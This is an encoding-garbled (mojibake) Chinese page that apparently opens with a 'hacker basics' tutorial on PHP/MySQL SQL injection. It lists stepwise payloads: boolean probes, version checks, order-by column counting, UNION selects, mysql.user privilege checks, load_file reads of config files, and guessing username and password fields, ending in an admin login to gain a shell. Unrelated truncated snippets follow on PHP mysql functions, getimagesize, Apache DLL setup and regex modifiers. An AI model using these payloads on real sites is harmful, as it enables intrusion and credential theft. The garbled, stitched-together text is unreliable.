ºÚ¿Í»ù´¡PHP½Å±¾×¢Èë
1~ÅжÏ×¢Èëµã~ £º’;and 1=1;and 1=2 -------£¨¸úASPÒ»Ñù£©
2~ÅжÏÊÇ·ñÄܽøÐÐUNION²éѯ~£ºand ord(mid(version(),1,1))>51 -------£¨Í¨¹ý°æ±¾ÅжÏ4.0ÒÔÉÏ¿ÉÓÃUNION²éѯ£©
3~ÀûÓÃorder by ±©×Ö¶Î~£ºorder by X -------£¨XΪÊý×Ö Èç¹û·µ»ØÕý³£Ôò˵Ã÷×ֶδóÓÚX£©
4~ÀûÓÃunionÀ´²éѯ׼ȷ×Ö¶Î~£º and 1=2 union select 1,2,3,....... -------£¨·µ»ØÕý³££¬¾Í˵Ã÷²Âµ½×¼È·×Ö¶ÎÊý¡££©
5~ÅжÏÊý¾Ý¿âÁ¬½ÓÕʺÅÓÐûÓÐдȨÏÞ~£ºand (select count(*) from mysql.user)>0 ------- £¨Èç¹û·µ»Ø´íÎóÎÒÃǾͲ¹ÜÀíÔ±µÄÕʺÅÃÜÂëÈç¹û·µ»ØÕý³££¬Ôò¿ÉÒÔͨ¹ý
and 1=2 union select 1,2,3,4,5,6, load_file(char(Îļþ·¾¶µÄasciiÖµ£¬ÓöººÅ¸ô¿ª)),8,9,10 [×¢Ò⣺load_file(char(Îļþ·¾¶µÄasciiÖµ£¬ÓöººÅ¸ô¿ª))Ò²¿ÉÒÔÓÃÊ®Áù½øÖÆ£¬Í¨¹ýÕâÖÖ·½Ê½¶ÁÈ¡ÅäÖÃÎļþ]£©
6~²Â½âXXXX±í~£ºand 1=2 union select 1,2,3,4,5,6.... from user --------£¨XXXXΪ±íµ¥Ãû£¬·µ»ØÕý³££¬ËµÃ÷´æÔÚÕâ¸ö±í£©
7~²ÂXXX×Ö¶Î~£ºand 1=2 union select 1,username,3,4,5,6.... from XXXX -------£¨Í¬ÑùµÀÀí£¬×Ô¼ºÌæ»»£¬Èç¹ûÔÚ2×Ö¶ÎÏÔʾ³ö×Ö¶ÎÄÚÈÝÔò´æÔÚЩ×ֶΣ©
8~ͬÀíÔٲ½âpassword×Ö¶Î,²Â½â³É¹¦ÔÙÕÒºǫ́µÇ¼ÉÏSHELL~
Ïà¹ØÎĵµ£º
PHPÊÖ²áÉÏÌṩÁËÒÔÏÂһЩÖ÷ÒªµÄmysqlÊý¾Ý¿âµÄÖ§³Öº¯Êý£º
mysql_affected_rows -- È¡µÃÇ°Ò»´Î MySQL ²Ù×÷ËùÓ°ÏìµÄ¼Ç¼ÐÐÊý
mysql_change_user -- ¸Ä±ä»î¶¯Á¬½ÓÖеǼµÄÓû§
mysql_client_encoding -- ·µ»Ø×Ö·û¼¯µÄÃû³Æ
mysql_close -- ¹Ø±Õ MySQL Á¬½Ó
mysql_connect -- ´ò¿ªÒ»¸öµ½ MySQL ·þÎñÆ÷µÄÁ¬½Ó
mysql_c ......
array getimagesize(string filename)
¸Ãº¯Êý·µ»ØÒ»¸öËÄÎÞËصľØÕ󡢸æËßÄãËù¸øÎļþÃûµÄͼÏñ³ß
´ç¡£¸ÃÎļþµÄ¸ñʽ±ØÐëÊÇGIF,jpeg»òPNGÖеÄÈÎÒ»ÖÖ¡£
Ôª
ËØ
ÃèÊö
0
¿í¶ÈµÄÏñËØÊý
1
¸ß
¶ÈµÄÏñËØÊý
2
ͼÏñµÄÀàÐÍ£¨GIF=1,JPG=2,PNG=3)
3
ÔÚ
IMG±ê¼ÇÖпÉÓõ ......
1:·ÅÁË6¸öÎļþÔÚcÅÌÏÂ(php5ts.dll,libmysql.dll ,php_gd2.dll,php_mysql.dll,php_mbstring.dll ),Ò»¸öÔÚwindowsÏÂ,ÁíÎå¸öÔÚwindows/system32ÏÂ
2:ÅäÖÃÁËpath
3:ÃüÁî:httpd.exe -w -n "Apache2" -k start À´²é¿´ÊÇÄÄÒ»ÐеĴíÎóÐÅÏ¢.
×ܽá:µ½ÏÖÔÚΪֹ,ÕûÁËÒ»Ìì,×°ÁËÈý´ÎϵͳµÄÂé·³ÖÕÓÚÇ×ÉíÖ¤Ã÷ÁË,
Õâ¸ö×ï¿ý»öÊײúÉúµÄÔÒò ......
i £ºÈç¹ûÔÚÐÞÊηûÖмÓÉÏ"i"£¬ÔòÕýÔò½«»áÈ¡Ïû´óСдÃô¸ÐÐÔ£¬¼´"a"ºÍ"A" ÊÇÒ»ÑùµÄ¡£
U£ººÍÎʺŵÄ×÷Óò¶à£¬ÓÃÓÚÉèÖÃ"Ì°À·Ä£Ê½"¡£
m£ºÄ¬ÈϵÄÕýÔò¿ªÊ¼"^"ºÍ½áÊø"$"Ö»ÊǶÔÓÚÕýÔò×Ö·û´®Èç¹ûÔÚÐÞÊηûÖмÓÉÏ"m"£¬ÄÇô¿ªÊ¼ºÍ½áÊø½«»áÖ¸×Ö·û´®µÄÿһÐУºÃ ......
